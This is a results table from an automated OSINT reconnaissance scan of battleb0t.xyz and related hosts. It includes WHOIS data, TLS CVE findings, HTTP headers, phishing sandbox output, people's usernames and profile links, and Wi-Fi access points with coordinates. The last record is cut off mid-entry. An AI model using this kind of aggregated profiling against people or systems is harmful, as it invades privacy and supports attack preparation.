| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Open Graph | nwapi.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CAUCESS (Net ID: 00:02:44:A8:10:34) | 50.1188, 8.6843 |
| 2023-05-12 03:19:11 | Human Name | No | Venmo | 2 | 0 | 6 | 0 | None | baptiste vauthey | login |
| 2023-05-12 02:55:11 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 43260 | 87.248.157.102 |
| 2023-05-12 02:54:23 | Linked URL - Internal | No | Web Spider | 0 | 0 | 5 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 03:00:58 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.98): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:20:27 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | PinkBike (Category: hobby)
https://www.pinkbike.com/u/patrick.pogoda/ | patrick.pogoda |
| 2023-05-12 03:11:13 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 3 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | vscode.battleb0t.xyz |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.9): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NazifBey (Net ID: 00:14:C1:18:2D:AC) | 40.2024, 29.0398 |
| 2023-05-12 03:35:51 | Malicious Co-Hosted Site | Yes | OpenDNS | 0 | 1 | 3 | 0 | None | Blocked by OpenDNS [00ffcc.cn] | 00ffcc.cn |
| 2023-05-12 03:12:15 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 6 | 0 | None | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
| telleria.com |
| 2023-05-12 02:45:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://web.archive.org/web/20130510155448/http://msdn.microsoft.com/library/office/apps/jj220082(v=office.15)', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2F', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1004"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3ec_IE_EarlyTabStart_0x758_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3ec_ConnHashTable<1004>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3ec_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3ec_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_3ec_IESQMMUTEX_0_519"\n 
"Local\\VERMGMTBlockListFileMutex"\n "IsoScope_3ec_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_3ec_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.40.106:443"\n "162.241.219.194:443"\n "35.186.254.174:443"\n "198.35.26.96:443"\n "198.35.26.112:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "en.wikipedia.org"\n "llink.to"\n "track.salesflare.com"\n "upload.wikimedia.org"\n "www.guelphcrc.ca"\n "www.wikipedia.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "wikipedia-tagline-en_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wikipedia-wordmark-en_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "language_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "magnify-clip-ltr_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "link-external-small-ltr-progressive_1_.svg" as clean (type is "SVG Scalable Vector 
Graphics image")\n Antivirus vendors marked dropped file "ellipsis_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "search_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "arrow-down_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "menu_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "arrow-down-progressive_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "bullet-icon_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"Office_Online_1_.png" has type "PNG image data 300 x 213 8-bit/color RGBA non-interlaced" and extension "png"\n "OfficeMobile2013_WP8_1_.png" has type "PNG image data 220 x 193 8-bit/color RGBA non-interlaced" and extension "png"\n "Word_on_iPhone_1_.jpg" has type "JPEG image data baseline precision 8 220x390 components 3" and extension "jpg"\n "Office_mobile_apps_1_.png" has type "PNG image data 220 x 143 8-bit/color RGB non-interlaced" and extension "png"\n "Microsoft_Office_for_Mac_2021_screenshots_1_.png" has type "PNG image data 220 x 124 8-bit/color RGBA non-interlaced" and extension "png"\n "wikipedia_1_.png" has type "PNG image data 100 x 100 8-bit/color RGBA non-interlaced" and extension "png"\n "Office_4.0_Suite_1_.jpg" has type "JPEG image data baseline precision 8 240x180 components 3" and extension "jpg"\n 
"Office_365_app_logos.svg_1_.png" has type "PNG image data 220 x 74 8-bit/color RGBA non-interlaced" and extension "png"\n "Microsoft_Office_logo__2019-present_.svg_1_.png" has type "PNG image data 120 x 120 8-bit/color RGBA non-interlaced" and extension "png"\n "Microsoft_Office_2013-2019_logo_and_wordmark.svg_1_.png" has type "PNG image data 220 x 70 8-bit colormap non-interlaced" and extension "png"\n "wikimedia-button_1_.png" has type "PNG image data 88 x 31 8-bit/color RGBA non-interlaced" and extension "png"\n "poweredby_mediawiki_88x31_1_.png" has type "PNG image data 88 x 31 8-bit colormap non-interlaced" and extension "png"\n "Symbol_category_class.svg_1_.png" has type "PNG image data 16 x 16 8-bit colormap non-interlaced" and extension "png"\n "16px-Symbol_list_class.svg_1_.png" has type "PNG image data 16 x 16 8-bit colormap non-interlaced" and extension "png"\n "20px-Semi-protection-shackle.svg_1_.png" has type "PNG image data 20 x 20 8-bit colormap non-interlaced" and extension "png"\n "Symbol_na_class.svg_1_.png" has type "PNG image data 16 x 16 8-bit gray+alpha non-interlaced" and extension "png"\n "OOjs_UI_icon_edit-ltr-progressive.svg_1_.png" has type "PNG image data 10 x 10 8-bit colormap non-interlaced" and extension "png"\n "Icon_pdf_file_1_.png" has type "PNG image data 16 x 16 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"wikipedia-tagline-en_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "wikipedia-wordmark-en_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "language_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n 
"magnify-clip-ltr_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "link-external-small-ltr-progressive_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "ellipsis_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "arrow-down_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "menu_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "arrow-down-progressive_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "bullet-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "Microsoft_Office_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "load_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "Office_Online_1_.png" has type "PNG image data 300 x 213 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab1BAA.tmp" has type "data"- Location: [%TEMP%\\Cab1BAA.tmp]- [targetUID: 00000000-00004080]\n "load_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "OfficeMac_v_X_1_.PNG" has type "PNG image data 125 x 164 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "OfficeMobile2013_WP8_1_.png" has type "PNG image data 220 x 193 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Word_on_iPhone_1_.jpg" has type "JPEG image data baseline precision 8 220x390 components 3"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001004]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- 
[targetUID: N/A]\n "Office_mobile_apps_1_.png" has type "PNG image data 220 x 143 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "~DFAB70199ED6534FEB.TMP" has type "data"- Location: [%TEMP%\\~DFAB70199ED6534FEB.TMP]- [targetUID: 00000000-00001004]\n "~DFD80A45019488F2CC.TMP" has type "data"- Location: [%TEMP%\\~DFD80A45019488F2CC.TMP]- [targetUID: 00000000-00 | 185.199.111.153 |
| 2023-05-12 02:44:14 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | *.netlify.app, netlify.app | pics.battleb0t.xyz |
| 2023-05-12 02:53:22 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 104.21.71.14 | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6dgs-guest (Net ID: 00:06:B1:28:66:5F) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:37:29 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Frankfurt Am Main, Germany | 207.154.228.169 |
| 2023-05-12 02:56:30 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | Germany, Hesse, Frankfurt am Main | 165.232.113.85 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.102): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Private (Net ID: 00:06:B1:20:D3:D2) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:00:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 2 | 0 | None | Honeypotproject (188.114.97.1): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.1 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft websites | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 5247 4331 (Net ID: 00:00:C5:AA:78:1C) | 37.7642, -122.3993 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | GitLab (Category: coding)<br>https://gitlab.com/_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 03:07:57 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169<br>https://nvd.nist.gov/vuln/detail/CVE-2013-0169<br>Score: 2.6<br>Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 185.199.108.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:55:25 | Username | No | Social Network Identifier | 0 | 0 | 4 | 0 | None | Altpapier | https://github.com/Altpapier/SkyHelperAPI/tree/master/examples |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00-duino.github.io]<br>https://www.openphish.com/feed.txt | 00-duino.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomDB2CA4 (Net ID: 00:0C:F6:DB:2C:A4) | 50.8897, 6.0563 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Duolingo (Category: hobby)<br>https://www.duolingo.com/profile/ayshoo | ayshoo |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ASI (Net ID: 00:02:6F:51:19:D9) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | fernando.r@alliedglobal.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'MSG349337853.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7544:120:WilError_01"\n "Local\\SM0:7544:304:WilStaging_02"\n "Local\\SM0:7544:120:WilError_01"\n 